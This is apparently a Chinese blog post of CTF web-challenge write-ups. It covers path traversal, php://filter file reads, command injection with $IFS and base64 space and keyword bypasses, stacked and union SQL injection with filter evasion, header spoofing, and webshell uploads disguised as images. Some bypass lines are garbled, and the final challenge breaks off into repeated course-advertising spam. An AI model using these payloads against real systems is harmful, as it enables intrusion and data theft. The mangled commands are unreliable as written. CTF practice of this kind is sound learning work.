…/ 路径穿越(目录遍历)攻击
…/ 是一种相对路径标识符,用于表示返回到上一级目录。这种技术被称为路径穿越(Path Traversal)或目录遍历攻击(Directory Traversal Attack)。攻击者可以利用目录遍历漏洞来绕过应用程序的访问控制机制,访问其本来不应该访问的文件或目录。通过连续使用 …/ 返回多次,攻击者可以逐级向上导航到更高级别的目录,直到达到目标文件或目录。
## [ACTF2020 新生赛]Include
首先打开发现有一个链接是tips
打开后是名为flag.php的文件,我们要想办法获取到文件的源码。
涉及到PHP伪协议,可以参考[PHP伪协议]( )
在了解了php伪协议后,我们判断此处应该使用php://filter读取文件内容
?file=php://filter/read=convert.base64-encode/resource=flag.php
对获取到的内容进行base64解密即可获得flag
base64解密网址:[base64解码]( )
## [ACTF2020 新生赛]Exec
查看网页源代码,发现提示为命令执行漏洞(command execution)
尝试查看post请求中是否存在命令执行漏洞
尝试写入payload 127.0.0.1| ls
发现存在命令执行漏洞,有一个index.php文件,使用之前说过的 路径穿越(目录遍历)攻击 尝试依次查看index.php文件的上层目录,看看目录中是否会有flag
方法: 127.0.0.1 | ls …/
127.0.0.1 | ls …/…/
127.0.0.1 | ls …/…/…/
在进行第三次时,发现一个名字叫做flag的文件,我们要的flag可能就在这个文件中,对flag文件的内容进行查看
127.0.0.1 | cat …/…/…/flag
## [GXYCTF2019]Ping Ping Ping
打开靶机我们发现页面只用一个 /?ip= 其余没有任何提示,我们猜测是在url中进行提交
尝试在url中衔接上/?ip=127.0.0.1
发现网页出现回显,我们再查看一下网页的源代码,看看有哪些提示,发现网页源代码也没有任何有用的提示
联想到上一道题是命令执行漏洞,我们再来尝试一下简单的命令执行漏洞
第一次我输入的是:
/?ip=127.0.0.1| ls 发现页面将空格进行了过滤
第二次我输入的是:
/?ip=127.0.0.1|ls 发现页面回显出了一些文件名
我们看到文件中有一个叫做flag.php,我们猜测flag存在于这个文件中,对其进行查看
/?ip=127.0.0.1|cat flag.php
但是我们之前已经知道了代码对空格进行了过滤,所以毫无疑问的失败了,这时就需要用到空格绕过
空格绕过解法:(以cat flag.php为例子,绕过cat与flag中间的空格)
{cat,flag.php}
cat
I
F
S
f
l
a
g
.
p
h
p
c
a
t
{IFS}flag.php cat
IFSflag.phpcatIFS
9
f
l
a
g
.
p
h
p
c
a
t
9flag.php cat
9flag.phpcatIFS
1
f
l
a
g
.
p
h
p
c
a
t
<
f
l
a
g
.
p
h
p
c
a
t
<
>
f
l
a
g
.
p
h
p
k
g
=
1flag.php cat<flag.php %09替换 cat<>flag.php kg=
1flag.phpcat<flag.phpcat<>flag.phpkg=‘\x20flag.php’&&cat$kg
(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)
或者base64编码
但是!当我们成功绕过空格后发现flag也被过滤了,那我们就先来查看一下index.php中的内容
cat$IFS$9index.php
发现其实过滤了很多东西
我们设置payload,读取一下所有文件的所有内容(我是这样理解的)
**因为过滤了很多内容,考虑使用``的形式来绕过正则限制
反引号的作用是将命令的输出当做输入执行**
/?ip=127.0.0.1;cat$IFS$1’ls’
然后查看一下网页源代码便获得了flag
或者采用另一种方法,对含有flag的payload进行b64编码,在用base64 -d解码,最后在通过sh执行,最终执行的就是 cat flag.php
echo$IFS 1 Y 2 F 0 I G Z s Y W c u c G h w ∣ b a s e 64 1Y2F0IGZsYWcucGhw|base64 1Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh
同样查看网页源代码,便可以看到flag
## [强网杯 2019]随便注
这是一道sql注入题,不要问我怎么知道的,和常规的sql注入题一样,检查有无注入
输入1’时回显报错 发现存在注入,且为字符型注入。
接下来获取列数
1’ order by 1# 正常
1’ order by 2# 正常
1’ order by 3# 报错
说明总共有两列
尝试最简单的联合查询(union select)查询所有数据库
-1’ union select 1,database()#
发现有一些字符被过滤掉了
更换思路,考虑堆叠注入查询所有数据库
注意 database 和 databases 的区别
1;show database;#
1;show databases;#
查询完数据库后,接下来查询所有表
1; show tables;#
发现有一个奇怪的数字,对它的列进行查看
注意这个符号是 ` 而不是’
-1’;show columns from1919810931114514;#
1919810931114514
发现其中有一列为flag,只要我们能查看它的内容,这道题就可以解出来了,但是 select字段被过滤,所以没有办法直接对它进行查询。
我们可以想到words是默认查询的表,再后台的查询语句类似以下
select * from words where id =’1‘;
根据之前我们的查看我们知道它没有过滤rename和alert关键字,所以我们可以修改表的结构,来达到查询flag列的内容
我们先查看words表下的列的内容
0’;show columns from words;#
**思路:将words表名改为words1,再将数字表名改为words,这样查询语句就会查询数字表名,我们再将flag字段名改为id字段或者直接添加id字段,就可以达到使用原先代码中的查询语句对flag中的内容进行查询,payload如下**
1’;rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);#
最后使用万能密码,即可得到flag
## [SUCTF 2019]EasySQL
同样是一道SQL注入题,同常规一样,检查注入点
输入1时查看回显
不管输入什么非零数字,都是一样的回显,尝试0和字符串时没有回显 说明是整型而不是字符型。
查询列数 发现不行
那就使用堆叠注入,尝试查看数据库,发现注入成功
1;show databases;
再查看表名
1;show tables;
发现出现了flag,判断flag就在Flag中,尝试对flag进行查询
这里应该是把Flag过滤掉了,但是看好多网上的大佬写到这一步是要去猜测后端的代码,我实在是知识太薄弱了,不知道为什么要猜测后端代码中存在||这个符号,所以先就按照这种思路来写,之后如果能理解的话我会回来将这个想法写完整
在sql语句中 || 表示的是或逻辑
也就是说: C1||C2 C1和C2只要有一侧是1 就是1 否则就是0
接下来就要猜测后端的语句了,大胆猜测逻辑就是这样子的
内部查询语句中有||操作符,只有我们输入非零数字才会满足||的逻辑为True从而进行回显的条件。
即:select 输入数据 || flag from Flag
第一种方法:
*,1
相当于构造了select *,1 || flag from Flag,这条语句执行起来相当于select *, 1 from Flag
另一种方法的思路就是 **将||或的逻辑改成连接符的作用**
就要补充一个知识点
设置 sql_mode=PIPES_AS_CONCAT来转换操作符的作用,PIPES_AS_CONCAT令||起到连接符的作用
构造payload:
1;set sql_mode=PIPES_AS_CONCAT;select 1
注:这里的逻辑是先把||转换为连接操作符,注意分号隔断了前面的命令,所以要再次添加select来进行查询,这里把1换成其他非零数字也一样会回显flag
## [极客大挑战 2019]Secret File
首先题目首页没给我们多大信息,我们查看一下源码,发现了一个 ./Archive\_room.php
对其进行访问,发现页面有一个SECRET可以点击,但是点开后提示我们回去看一看
我们查看第一页的源代码,发现还有一个文件叫做./Action.php
但是对他进行访问后发现实际到达的却是end.php
这时我们掏出我们的BP进行一个简单的抓包
发现了一个叫做secr3t.php的文件,对他进行访问,打开是源代码,告诉我们flag放在了flag.php中
那我们就对flag.php进行访问,但是还是不显示,对他的源代码进行查看也没有任何帮助,这里就想到了[PHP伪协议]( )
secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
最后对密文进行base64解码就可以得到结果
## [极客大挑战 2019]LoveSQL
很明显是一道sql注入题,首先判断注入是整型还是字符,说明是字符型注入,并且使用的是MariaDB数据库
使用万能密码进行一下测试
我们发现它给了我们一个password,但是经过尝试他并不是flag,对他进行一下解码发现都不行,似乎好像没有什么用处,那我们先按常规查看一下列数吧
1’ order by 3#
总共有三列
查询一下表名,总共有俩个表
1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
可以看到有一个表叫做geekuser,可能有我们想要的信息
1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘geekuser’#
查询id username password的具体内容
1’ union select 1,2,group_concat(id,username,password) from geekuser#
发现给了我们账号密码 我们登录一下试一试,还是没有用。
那我们用同样的方法对另一个表进行查看,也许flag存在另一个表中
1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’#
1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
将一长串复制出来方便查看,发现了我们要的flag
## [极客大挑战 2019]Http
单从网页上来看没有什么发现,涉及到http,所以继续掏出我们的BP进行抓包
找到了一个Secret.php,访问一下
这时我们需要修改header头,把https://www.Sycsecret.com写进去,复制一个头文件,添加关键的一行
Referer:https://www.Sycsecret.com
GET /Secret.php HTTP/1.1
Host: 9141-f2e36f57-6b2f-4563-8342-a0cfdb3ec455node3.buuoj.cn:29788
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
随后提示我们浏览器需要使用Syclover,这时我们修改一下User-Agent的内容,使得服务器以为我们使用的是Syclover进行的访问
User-Agent:Syclover
这时它又说我们只能通过本地进行一个访问,那么我们就继续更改http请求文件,flag出现
X-Forwarded-For:127.0.0.1
## [极客大挑战 2019]Knife
题目提示可以使用菜刀链接后门,使用菜刀进行后门连接
成功访问后进行根目录访问,有一个flag文件,进去后发现flag
## [极客大挑战 2019]Upload
根据题目可以看出来这是一道文件上传题目,此类题目一般都是利用网页上传口的一些漏洞,上传诸如一句话木马等带有危险性的文件去进入其他人的服务器,再利用类如菜刀蚁剑等设备连接服务器进行操作。
首先上传一句话木马
注意这里要将代码写入文件进行上传
报错,说明后台可能对非图片格式进行了过滤,我们更改文件格式为.jpg,再次尝试
报错信息告诉我们对文件中<?的内容进行了过滤,那我们对文件内容进行一下修改
注意我们这里cmd就是我们开的后门shell密码
依然会有一个报错的提示,说明我们需要添加图片的头,然后再进行上传
GIF89a
提示我们上传成功了,但是我们上传的仅仅是一个.jpg的文件,无法供我们利用,这时候我们需要使用到BP进行一下简单的抓包,并且将.jpg更改为.phtml,使得网页后端可以执行我们的一句话木马
然后我们小马就带着我们成功进入了网站的后台使用AntSword连接网站后门,这里需要开启php服务
也可以使用/upload/filename进行直接访问打开文件
这里我重新上传了一个shell文件名的小马
然后就可以对网站后台数据库进行访问
注:
在使用AntSword时有的同学在测试连接时显示返回为空,说明你的一句话木马有问题,未能被服务器正常解析,可以检查一下上传的文件格式和代码是否有误
我们打开虚拟终端返回到根目录
cd /
然后查看flag文件
cat flag
## [ACTF2020 新生赛]Upload
当我们把鼠标移动到灯泡上时,发现了可以进行的文件上传地址,先简单构造一个payload进行尝试一下一句话木马上传
提示我们只能上传固定格式的图片,那我们更改文件格式,并加上图片头
`GIF89a`
提示我们文件上传成功
我们先进行简单抓包更改shell的文件格式为.phtml使其能够运行为我们打开后门
上传成功后提示我们上传到的路径为./uplo4d,尝试用AntSword进行数据库连接
注意这里我直接只使用 /uplo4d进行连接时一直报错,看了好多博主但是他们也是只有这个好像,最后才试出来连接时要把所有的全写完整才能连接成功而且编码器最好使用base64进行编码,不然可能是乱码而且无法使用shell
接下来就是返回根目录然后查看flag文件了
返回根目录
cd
查看flag
cat flag
## [极客大挑战 2019]BabySQL
经典的SQL注入题,先尝试一下万能密码
我们发现他把我们注入时输入的or过滤了,那我们尝试一下双写or ,这样他在删除一个or以后还会有,但是依然发现不可以
1’ oorr 1=1
那我们换思路进行一下进行联合注入(盲猜和之前一样三列),发现同样删除过滤了我们的union select关键字
依然对union select进行双写尝试,发现可以
1’ ununionion seselectlect 1,2,3#
那接下来就是爆库常规的SQL注入了,同样如果遇到被删除过滤的部分进行双写即可
1’ ununionion seselectlect 1,2,database()#
1’ ununionion seselectlect 1,2,group_concat(schema_name)frfromom (infoorrmation_schema.schemata) #
1’ ununionion seselectlect 1,2,group_concat(column_name)frfromom(infoorrmation_schema.columns)whwhereere table_name=“Flag”
1’ ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)
## [极客大挑战 2019]PHP
题目说他进行了备份 那我们扫描网站目录,发现了www.zip进行访问
发现网站的源码直接被我们下载了
源码中有这几个文件,打开我们可以使用记事本
打开flag.php进行查看,发现错误不是我们想要的flag
那我们再查看一下index.php
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
### 给大家的福利
**零基础入门**
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
4778356)]
[外链图片转存中...(img-ZBLwyKl3-1713034778356)]
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
[外链图片转存中...(img-s1jrrjN0-1713034778356)]
### 给大家的福利
**零基础入门**
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中...(img-hKmFI8Zc-1713034778357)]
4701
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
